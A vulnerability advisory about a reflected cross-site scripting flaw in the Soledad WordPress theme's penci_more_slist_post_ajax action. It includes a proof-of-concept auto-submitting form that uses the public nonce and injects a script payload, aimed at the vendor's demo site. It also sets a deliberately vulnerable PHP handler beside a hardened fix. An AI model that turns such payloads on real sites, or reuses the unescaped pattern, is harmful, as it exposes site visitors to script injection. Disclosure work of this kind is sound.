Soledad < 8.2.5 - Reflected Cross-site Scripting

Description

The theme does not sanitise the id, datafilter[type] and other parameters of its penci_more_slist_post_ajax AJAX action, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.

Proof of Concept

A threat actor can obtain the nonce value from the site's main page by searching it for the ajax_var_more variable:

var ajax_var_more = {"url":"https:\/\/soledaddemo.pencidesign.net\/wp-admin\/admin-ajax.php","nonce":"d6c491629c","errorPass":"<p class=\"message message-error\">Password does not match the confirm password<\/p>","login":"Email Address","password":"Password","headerstyle":"default"};

They can then create a web page that automatically submits the following form to the site from the victim's browser, such as:
```html
<html>
	<body onload="myform.submit()">
		<form action="https://soledaddemo.pencidesign.net/wp-admin/admin-ajax.php" method="POST" name="myform">
			<input type="hidden" name="action" value="penci_more_slist_post_ajax" />
			<input type="hidden" name="id" value=""><script>alert`XSS-Checker`</script>" />
			<input type="hidden" name="nonce" value="d6c491629c" />
		</form>
	</body>
</html>
```
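As an added illustration of the fix (example code, not the theme's actual code), the following shows an AJAX handler in the vulnerable shape beside a hardened version. The action name and the id / datafilter[type] parameters come from the advisory; the nonce action name, the allowed type values and the handler bodies are assumed. Note that the nonce check alone does not prevent this reflected XSS, since the nonce is public on the main page (as the proof of concept shows); validating the inputs and escaping them at output is the actual fix.

```php
<?php
// Added illustrative example, not the Soledad theme's code.
// penci_more_slist_post_ajax, id and datafilter[type] come from the advisory;
// the nonce action name, allowed type values and function bodies are assumed.

// Vulnerable pattern: request parameters are reflected into the response unescaped.
function example_vulnerable_more_slist_post_ajax() {
    $id   = isset( $_POST['id'] ) ? $_POST['id'] : '';
    $type = isset( $_POST['datafilter']['type'] ) ? $_POST['datafilter']['type'] : '';
    // Whatever arrives in $id or $type is emitted verbatim into the HTML.
    echo '<div class="penci-slist" data-id="' . $id . '" data-type="' . $type . '"></div>';
    wp_die();
}

// Hardened version: verify the nonce, validate and sanitise inputs, escape on output.
function example_hardened_more_slist_post_ajax() {
    // Reject requests whose nonce does not match (assumed nonce action name).
    // The nonce is readable by anyone, so this is CSRF hygiene, not the XSS fix.
    check_ajax_referer( 'penci_more_slist_post_nonce', 'nonce' );

    // id is a post ID: coerce to a non-negative integer and reject 0.
    $id = isset( $_POST['id'] ) ? absint( wp_unslash( $_POST['id'] ) ) : 0;
    if ( 0 === $id ) {
        wp_send_json_error( 'invalid id', 400 );
    }

    // datafilter[type] should be one of a small fixed set: allow-list it.
    $allowed_types = array( 'recent', 'popular', 'category' ); // assumed values
    $type = isset( $_POST['datafilter']['type'] )
        ? sanitize_key( wp_unslash( $_POST['datafilter']['type'] ) )
        : 'recent';
    if ( ! in_array( $type, $allowed_types, true ) ) {
        wp_send_json_error( 'invalid type', 400 );
    }

    // Escape at the output boundary even though the values were already validated.
    echo '<div class="penci-slist" data-id="' . esc_attr( $id )
        . '" data-type="' . esc_attr( $type ) . '"></div>';
    wp_die();
}

// Only the hardened handler is registered; the vulnerable one is shown for contrast.
add_action( 'wp_ajax_penci_more_slist_post_ajax', 'example_hardened_more_slist_post_ajax' );
add_action( 'wp_ajax_nopriv_penci_more_slist_post_ajax', 'example_hardened_more_slist_post_ajax' );
```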

Affects Themes

Soledad (fixed in 8.2.5)

Classification

Type: XSS

Miscellaneous

Original Researcher: Truoc Phan
Submitter: Truoc Phan
Verified: Yes

Timeline

Publicly Published: 2022-09-13
Added: 2022-09-13
Last Updated: 2022-09-13